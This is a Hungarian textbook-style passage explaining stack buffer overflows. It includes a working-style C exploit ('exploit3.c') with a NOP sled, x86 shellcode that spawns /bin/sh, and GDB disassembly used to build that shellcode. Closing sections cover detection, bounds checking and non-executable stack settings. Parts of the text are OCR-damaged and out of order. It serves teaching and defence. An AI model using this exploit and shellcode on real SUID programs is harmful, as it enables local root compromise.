hogy egy shellt (parancssort) nyissanak root-jogokkal a rendszeren. Ez főleg a SUID-programoknál érdekes. mint a ToGreat változó. Ez természetesen hibákat eredményez. ami root-jogokkal fut. hogy egy Buffer-Overflow segítségével „megörököljenek" egy root-jogokkal rendelkező shellt. A biztos eredmény: memóriavédelmi hiba és a program összeomlása. Eközben az adatok mindent felülírnak. Forráskódokkal mutatjuk meg. természetesen megnő a lehetséges hibaforrások száma.2. a tulajdonképpeni Buffer-Overflow-t. mint a raw sockets vagy bizonyos rendszererőforrások elérése.2. A kivitelezéshez szükséges programok (GCC=GNU C Compiler. Talán felmerül a kérdés. //egy ciklus. amely a tulajdonképpeni hibát okozza void Overflow(char *string) { //A puffer kisebb. úgynevezett kizsákmányoló (exploit) kód van. . és . és végül a program hibás működését. Itt a támadók különösen abban érdekeltek. i < 255. hogyan nem íródnak felül válogatás nélküli tetszőleges programrészek. amelyek a roothoz tartoznak. holott csak 16 bájtra volna lehetőség.és Shellscript-ismeretekre van szükség . amit átadtak charTolittle[16] //megpróbálja 256 bájttal teleírni a puffért. //ezért az utána elhelyezkedő terület felülíródik strcpy(ToLittle. OverFlow (To Great) } //Most jön a függvény. amely A-kkal tölti ki a memóriaterületet for(i = 0. és egy hosszú karakterláncot küld egy meghatározott programnak. Ezzel át lehet venni az ellenőrzést a számítógép felett. csak hogy megszerezzék a nekik szükséges helyet. GDB=GNU Debugger) futtatásához még Linux is kell.adatmennyiség kilóg a pufferből egy olyan területre.különben nem fog menni. i++) { large_string[i] = 'A'. s hogyan lehet célzottan megváltoztatni a függvény visszatérési pontjának a címét. az lefagy. amit ott találnak. A továbbiak megértéséhez alapos assembler. Ha minden felhasználó root-jogokkal tud programokat futtatni. A ping egy jó példa az olyan programra. Ennek a következő a háttere: egyes funkciók. hogy a program a tulajdonos és nem a felhasználó jogaival fut. root-jogokat követel meg. hogy miért kell egyáltalán root-jogokkal futniuk a programoknak. amelyek arra valók. akkor csak annyit kell tennie. amely arra kényszeríti a programot. de minden felhasználó elindíthatja. amikor a program egy eljárásból vagy függvényből visszatér. A shell-kód értelme és célja. Egy példa az ilyen kódra: voidman( ) { //a ToGreat változót 256 bájttal inicializálja char ToGreat[256] //ciklusváltozó int i. Azonban bizonyos bevitelekkel még végre lehet hajtatni egy kódot az instabil rendszeren. hogy egy shellt hozzon létre. hogy ez fusson a főprogram helyett. hiszen rootként futó eljárások csak olyanok lehetnek. Ha a támadó kapcsolatot épít fel a hosttal. Világos. 11. string). Ez egy SUID bitet helyez el. hogy addig ír a pufferba. amely már nem ehhez a pufferhez. hanem más változókhoz tartozik. amelyek már bootoláskor elindulnak. végül rátesz még egy lapáttal. Sok. ami azt jelenti.1 Hogyan lehet ezt kihasználni? Ha a támadó Buffer-Overflow-val akar lefagyasztani egy programot. például az 1024 alatti portoké vagy eszközöké. hogy egy ilyen program biztonsági kockázatot jelenthet. } 11.2 Hogyan működik? Shell-kód alatt olyan assembler-kódot értünk. amíg az megtelik.

mert még nem ismerjük a shellkód helyét a memóriában. i < strlen(shellcode). int offset=DEFAULT_OFFSET. Az „Offset" értéke 0 0 512 0x90 printf("Using address: 0x%x\n". } A „get_sp" változó feltöltése assembler-kóddal} mid main(int argc. Ez a kód még nincs kész. Most elhelyezzük az endbyte-ot. A „ptr" megfelel a „bufF"-nak addr_ptr = (long *) ptr. i+=4) *(addr_ptr++) = addr. cbar shettcode[ ] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\ xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\ x40\xcd" "\x80\xe8\xdc\xff\xff\xff\bin/sh". i < bsize. Pointer az „addr-ptr" helyére. for(i = 0.offset. \n"). Egy valódi exploitnál ez többnyire több mint 100 . a többi assembler. A változókhoz értéket rendel if (argc > 1) bsize = atoi(argv[1]). i < bsize/2.(strlen(shellcode)/2)). unsigned long get_sp(void) { asm("movl%esp. hogy növeljék a találat esélyeit. buff[bsize -1]= '\0'. . mint a „DEFAULT_OFFSET".Magyarázatképpen egy forráskód: exploit3. ptr = buff.%eax").c #include #define DEFAULT_OFFSET #DEFAULT_BUFFER_SIZE #defineNOP addr = get_sp( ) . Ezért nagyon pontosan meg kell becsülni. A Shellcode változóhoz egy értéket rendelünk.1000 NOP kód. mert az addr-ptr címét minden cikluslefutással növeljük. *ptr. Kiírja a „Using address: 0x%x\n" -t és az „addr" értékét. i++) buff[i] = NOP. a pointer minden alkalommal egy bájttal tovább mutat. Beírjuk a shellkódokat a memóriába. addr. for (i = 0. dhar *argv[ ]) { char *buff. } memcpy(buff. hogy kevesebb számot használunk. bsize=DEFAULT_BUFFER_SIZE. ptr = buff+ ((bsize/2) . exit(0). system("/bin/bash "). a Shellcode csak a „bin/sh". long *addr:ptr. int i. addr). Pointer a ptr címére for (i = 0. olvashatóbbá váljon. putenv(buff)."EGG=". hogy a kód. Fontos még megemlíteni.4). Természetesen a támadók több NOP-kódot is beépítenek. i++) *(ptr++) = shellcode[i]. azáltal. if (!(buff=malloc(bsize))) { printf("Can't allocate memory. A NOP-kódokat a pufferméret feléig írjuk a memóriába. hogy eltaláljuk a megfelelőt. if (argc > 2) offset = atoi(argv[2]). hogy a NOP-kód csak a Ox90-es Intel CPU-kon fut. } Olyan fogalmakkal lehet dolgozni.

3 Minek kell a Shellcode változónál állnia? Most már mindenképpen segítségül kell hívni egy GDB-t! shellcode. Ehhez először a GCC-vel kell compilerelni a programot. amely szabad helyet készít a helyi változóknak. és másolatot is lehet róla készíteni! (gdb) disassemble main Dump of assembler code for function main: 0x8000130: pushl %ebp 0x8000131: movl %esp.%esp 0x8000136: movl $0x80027b8.%esp Ez volt az eljárás kezdete. name[1] = NULL.%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <_execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x80001a34<__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx.2.0xfffffff(%ebp) 0x800013d: movl $0x0. A parancs így néz ki: gcc -o shellcode -ggdb -static shellcode. %ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb. execve(name[0].%ebp $0x8. hogyan néz ki a forráskód assemblerben. Ebben az esetben: . (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+l>: movl %esp. Hogy ezt megértsük. NLL). elindítjuk.%eax 0x800014d: pushl %eax 0x800014e: call 0x8002bc <__execve> 0x8000153: addl $0xc.%eax 0x8000149: pushl %eax 0x800014a: movl 0xfffffff8(%ebp). és GDB-vel elemezzük.c #include void main( ) { char *name[2].%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp).%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp).c Most elindítjuk a GDB-t: gdb shellcode A GDB ingyenes szoftver.%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax. name. name[0] = "/bin/sh". és egy új frame-pointert állítunk elő.(%eax) 0x80002e1 <__execve+37>: movl $0xfffffffc. A régi frame-pointert mentjük.0xfffffffc(%ebp) 0x8000144: pushl $0x0 0x8000146 leal 0xfffffff8(%ebp). %esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump.%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp). } Hogy megnézzük.%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp. először a „main"-t analizáljuk: 0x8000130: 0x8000131: 0x8000133: pushl movl subl %ebp %esp.11.%ebp 0x8000133: subl $0x8.%edx 0x80002d2 <__execve+22>: movl %edx.%esp 0x8000158: popl %ebp 0x8000159: ret End of assembler dump.%esp 0x8000156: movl %ebp.

A "/bin/sh" címét bemásoljuk az EBX-be. 0x8000146: leal 0xfffffff8(%ebp). 0x8000149: 0x800014a: 0x800014d: 0x800014e: pushl call pushl %eax 0xfffffff8(%ebp).0xfffffffc(%ebp) A 0x0 (NULL) értéket a második pointer of name[ ] -be másoljuk. Ezt úgy tudja elérni. ha félresikerül? A program végeérhetetlenül tovább hozná az értékeket a stackből. De mi történik. Kernel módra váltunk. 11 az execve. Ez az index a syscall-táblában.%ebx 0xc(%ebp). Minden folyamat az operációs rendszertől függ. (gdb) disassemble_exit Dump of assembler code for function _exit: 0x800034c <_exit>: pushl %ebp 0x800034d <_exit+1>: movl %esp. 0x800013d: movl $0x0. 0x8000144: pushl $0x0 Az execve( ) argumentumait fordított sorrendben helyezzük (push) a stackbe.%edx $0x80 A 0xb-t a stackbe másoljuk. 0x80002bc <__execve>: 0x80002bd <__execve+1>: movl 0x80002bf <__execve+3>: pushl %ebp %esp. 0x8000136: Az eljárás kezdete movl $0x80027b8.char *name[2]. A támadó egy ilyen programot természetesen megpróbál tisztán programozni.%ecx 0x10(%ebp). A Null pointer címét az EDX-be másoljuk. Az execve( ) meghívása itt kezdődik.0xfffffff(%ebp) 0x80002c0 <__execve+4>: movl 0x80002c5 <__execve+9>: movl 0x80002c8 <__execve+12>: movl 0x80002cb <__execve+15>: movl 0x80002ce <__execve+18>: int $0xb.%eax 0x8(%ebp). amelyek azután más értékeket tartalmazhatnának. } gcc -o exit -static exit. %eax 0x8002bc <__execve> Beírjuk a stackbe a "/bin/sh" sztring címét. Az execve( ) library eljárás meghívása. movl Betöltjük a "/bin/sh" sztring címét az EAX regiszterbe. NULL-ával kezdünk.%eax Beírjuk a name[ ] címét a stackbe..c #include void main( ) { exit(0)..%ebp A 0x80027b8 értéket (a .%eax Betöltjük a name[ ] címét az EAX regiszterbe. Most execve( ). %ebp pushl %ebx . Ez ugyanazt jelenti mint: name[0]="/bin/sh". Beírja az instruction pointert a stackbe. Ez ugyanazt jelenti mint: name[1] = NULL./bin/sh" címe) bemásoljuk az első pointer of name[ ] -be. Nem valami finom dolog. hogy hozzáfűz egy exit syscall-t: exit.c gdb exit (no debugging symbols found). A name [ ] címét bemásoljuk az ECX-be. Tulajdonképpen ez minden az execve( ) meghívásáról.

%eax movl 0x8(%ebp). %ecx leal null-offiet(%esi). %ebx leal string_addr. Ha a „/bin/sh" sztring elé egy Call parancsot teA programkód a módosításokat követően jmp offset-to-call popl %esi .%edx int $0x80 movl $0x1. és a C a Call helyett áll.%ebx movl %ebp.0x800034f <_exit+3>: 0x8000350 <_exit+4>: 0x8000355 <_exit+9>: 0x8000358 <_exit+12>: 0x800035a <_exit+14>: 0x800035d <_exit+ll>: 0x800035f <_exit+19>: 0x8000360 <_exit+20>: 0x8000361 <_exit+21>: 0x8000362 <_exit+22>: 0x8000363 <_exit+23>: End of assembler dump.null_addr movl $0xb. könnyítésképpen bizonyos parancsokat lehet használni. A legtöbb program 0-t ad vissza.%ebx int $0+80 movl 0xfffffffc(%ebp). Mivel soha nem tudjuk pontosan. a sztringcím lesz visszatérési címként megadva.%eax movl %esi. # 2 bytes # 1 byte 3 bytes # 4 bytes # 7 bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes . %edx int $0x80 movl $0x1. movl %esÍ.null_byte_addr movl $0x0. %ebx int $0x80 /bin/sh string goes here. movl string_addr.nullbyteoffset(%esi) movl $0x0. ez az exit kód. %ebx leal array-offset. ha nem volt hiba. mikor a hívás lefutott. (%esi). Jump-pal és Call-lal olyan parancsokat lehet használni. természetesen a sztring címét és az endbyte nullát a tömb mögé tesszük.string_addr_addr movb $0x0. hogy a visszatérési címet bemásoljuk a regiszterbe. %eax movl string_addr. %ebx int $0x80 call offset-to-popl /bin/sh string goes here. A J itt a Jump.null-offset(%esi) movl $0xb. pushl %ebx movl $01. %esp popl %ebp ret nop nop nop szünk. Most már csak annyit kell tenni. és a Call parancshoz egy Jump parancsot.%ecx leal null_string. %eax movl $0x0. és ezután kell végrehajtani az „int 0x80"-at. hogy pontosan hova kerül a memóriában az exploit kódunk. Összefűzve ez a következőképpen néz ki: Elhelyezzük a sztringet a kód mögött. amelyekkel relatív címeket kapunk. A programfutás a következőképpen néz ki: Az Exit syscall-t a 0xl-re helyezzük az EAX-ben. %eax movl $0x0.array-offset(%esi) # movb $0x0.

logikus. Itt szisztematikusan ellenőrizni kell a paraméter-átadásokat és az egyes funkciókat (a DLL-eket és a library-ket).0x7 (%esi) movl $0x0. és ezután a transzferkontrollt kell használni. 11. ezzel minden veszélytől védve vannak.%edx int $0x80 movl $0x1. a vprintf( ). Hogy kiderüljön. Először azonban a bináris kód hexmegjelenítéséhez kell jutnunk. és azután teszteljük. Ezért a kódot. amelynek megvan a forráskódja. a user interfészen keresztül lehet váratlan bevitelekkel tesztelni a programot. először a compilerrel lefordítjuk. hogy egy puffért bevitelekkel megtöltsünk. egy ciklus. az ismert bizonytalansági faktorokra. a strcat( ). akkor lehet mindent compilerelni.4 Honnan lehet felismerni a Buffer-Overflow-t? Szerencsére sok lehetőség van a Buffer-Overflow-k felismerésére. és ismét a GDB-t használni.3 Áldozat a Buffer-Overflow-kért Ezekhez a támadásokhoz tehát egy pufferra van szükség. ami természetesen egy fatális programozási hiba. amely elolvas és a pufferbe ír egyes karaktereket. a sztringcímről tömbre és a sztringcímet nullára számoljuk át. Sok operációs rendszer ezt megint csak nem engedi meg. Az ilyen funkciókat a forráskódban a legegyszerűbb megkeresni. de nem a Heap-based Overflow-któl. ezt kapjuk: jmp 0x26 popl %esi jnovl %esi. egy null-terminálással megjelölt program végéig.Ha az offseteket Jump-ról Call-ra. amelyet futtatunk. a kódot egy globális tömbbe helyezzük a fájlszegmensben. ezért ritkábban is találkozni az előbbiekkel. a strcpy( ) és a scanf( ) nem figyelnek arra. hogy mi áll hozzá a rendelkezésünkre. A könyvtárfüggvények tartalmazta parancsok. neki elég néhány könyvtárfunkciót használnia. és a \0 jóval a puffer vége után is elhelyezkedhet. Ez persze véd a Stack Overflow-któl. közvetlenül a Strcpy-val kerül használatba. a sprintf( ). A programozók úgy gondolják. Ha nincs ilyen lehetőség (nincs meg a forráskód). %eax movl $0x0. De van egy probléma! Ez a kód sajátosan változik. egy kis példa: void tulcsordul(char argvFG) { char BuffertoLittle [4]. íme. A hiba azonban többnyire nem a programozón múlik. Hogy ezt elérjük.0x8(%esi) movb $0x0. Ha egy bevitel ellenőrzés nélkül. Lényegében a dinamikus hozzárendelés sem sokkal biztonságosabb. Mik azok a Heap-based Overflow-k? Heap-based Overflow-kat sokkal nehezebb előállítani. Call-ról Popl-ra. Ha ez kész. egy fájlszegmensbe vagy stackbe kell csomagolni.0xc(%esi) movl $0xb. hogy soha nem statikus puffereket. A másik eljárás arra. %ebx int $0x80 call 0x2b string \"/bin/sh\" # 2 bytes # l byte # 3 bytes # 4 bytes # l bytes # 5 bytes # 2 bytes # 3 bytes # 3 bytes # 2 bytes # 5 bytes # 5 bytes # 2 bytes # 5 bytes #8 bytes álló puffer.%ecx leal 0xc(%esi). Ilyenkor többnyire a sztringhosszúságot figyeljük az átadási pontokon. s a programozók sem nagyon védik ettől a programjaikat. hanem helyette malloc( ) -ot használnak. és hibákat keresünk. a gets( ). Ha olyan programról van szó.%eax movl %esi. 11. hogy túl lehet tölteni a puffért. mekkora a rendelkezésre . akkor nincs gond. %ebx leal 0x8(%esi). Hozzáértő hackereknek tehát ez egy egészen különleges támadási pont! A gond az. működik-e a kód. és máris jelentkeznek ezek a problémák. ami attól függ. mint a Stack Overflow-kat. Linuxprogramoknál szabadon hozzáférhető. A sztring azonban lehet túl hosszú. amelyhez a vége után is hozzá tudunk írni. ami pl. A parancsok egyszerűen egy null-karakterig (\0) olvasnak.

argv). } eke { cout « "Bevitel OK. úgy kell ezt */ /* csinálni. A felderítés egyik lehetősége lenne a szerver lekapcsolása. és az egész Linuxot kompletten át lehet írni. ha minden program forráskódja megvan. és részletről részletre átvizsgálni. Így a fenti példa szerinti Buffer-Overflow természetesen nem sikerülhet. ha egyszer már megleptek. Ha ez megtörténik. hogy a „heap"-ben és a „stack"-ben programok futhassanak (noexec_user_stack. a SecureLINUX és a Solaris 2. Ha egy kifelé nyitott hálózati szolgáltatóról van szó. noexec_user_heap). hajtsd végre\n".if (strlen(argv) > 7) { cout« "Rossz: a puffer túl fog csordulni\n". Ezáltal a Solarissal kapott programok. A standard kernelt kell megváltoztatni. ami megakadályozza. Ezért érvényes a régi szabály: „Minél jobban eltérsz a szabványosított megnevezésektől. } /* Helyes: ahogy a felső részben. Ahogy az előbbiekben. a támadó többé nem tud mit kezdeni ezzel a számítógéppel. strcpy(BuffertoLittel. „PZK" túlfut */ } int main(int argc. és a reakcióra várni. hogy a shellneveket és az /etc/passwd-fájlt megfelelően megváltoztassuk. A hacker célja mindig az. A Solaris 2. itt is szándékosan túl hosszú beviteleket kell csinálni. és utána végrehajtani vagy */ /* mindjárt biztonságos függvényeket használni */ Természetesen más módszerek is vannak. honnan jönnek az adatok. Így már a hálózat felügyeletével is fel lehet ismerni. char *argv[ ]) { cout« "Az átadandó paraméter hossza:" « strlen (argvF1G) « "\n". Különösen. vagyis manuálisan. a „root"-ot lehet egyszerűen így nevezni: „HAHA". Ez akkor segíthet. nincsenek veszélyben. disassemblálni. A SecureLINUX-nál egy patch-re van szükség ehhez. . ha a felhasználói privilégiumokat nem használják ki túlságosan. argv). /*Rossz: Ha argc[ ] túl nagy. strcpy(BuffertoLittle. Honnan ismerünk fel egy Buffer-Overflow-támadást? A Buffer-Overflow-támadásokat nagyon nehéz felfedezni. vagy váratlan karakterekkel feltölteni. és a következőképpen elindítani: „Név 052698541".6+ nál a „normál" telepítés után aktiválni lehet egy kapcsolót. hogy az összedöntí a programot. } 11. mielőtt a hacker törölhetné a nyomait a logfájlokból.5 Milyen védelmi mechanizmusok vannak? Tulajdonképpen csak egy Linux-verzió. A névadási kényszer miatt ez a variáció szinte mindig sikeres. hanem egy manuálisan előidézett BufferOverflow demonstrálása. bevitelekkel tesztelni a Buffer-Overflow lehetőségeket." A demonstráláshoz egyszerűen le kellene fordítani ezt a programot. De felhasználóként vagy rendszergazdaként megvan még az a lehetőségünk is. Megmutatja. annál nehezebb lesz a támadás. hogyan lehet paraméterekkel és más átadásokkal (ezek más helyeken is történhetnek) szándékosan lefagyasztani programokat. illetve védhetnek bizonyos mértékig e támadások ellen. mint azt a programozó várta.6+ védenek. először ellenőrizni. tulcsordul(argv[1]). hogy egy rootshell-hez jusson egy másik Linux-gépen. mert a beírás hosszabb volt. akkor a Netcattel egyenként lehet ellenőrizni a parancsokat a Buffer-Overflow-ra. és egy speciális compilerrel minden programot újra kell fordítani. pl. Ezt indítja el az exploiton keresztül is. Itt nem a forráskód a fontos. amelynél a parancsokat és a szintaxist is meg lehet tudni. Itt az átadandó paraméternek olyan a hossza. Egy programot lehet pl.

Így a tapasztalatlan támadóknak aligha van esélyük. és csökken annak a kockázata. illetve a belső interfészek megtámadását.2 A Buffer-Overflow-k és a tűzfalak Egy tűzfallal természetesen csökkenteni lehet a Buffer-Overfíowtámadások lehetőségét. e-mail gateway. proxy.5. Konfliktusok abból adódhatnak. Teljes biztonságban azonban sohasem érezhetjük magunkat.1 Összefüggés a CPU és a Buffer-Overflow között Manapság sok szervert működtetnek a kereskedelemben nem szokásos CPU-kkal. . router.11. ha a szervernek még más feladatokat is el kell látnia. Ezek nagy biztonsági kockázatot jelentenek. pl. nem fognak bennük kiindulási pontot találni Buffer-Overflow-khoz. HTTP-szerver vagy adatbázis szerverként működik. 11. Mivel a tűzfalak szinte mindig viszonylag kicsik. hogy egy készre fordított exploit jelenik meg az interneten. Ezáltal a támadót vissza lehet fordítani az assembler-kód irányába.5. A tűzfal megnehezíti a külső.

Sign up to vote on this title
UsefulNot useful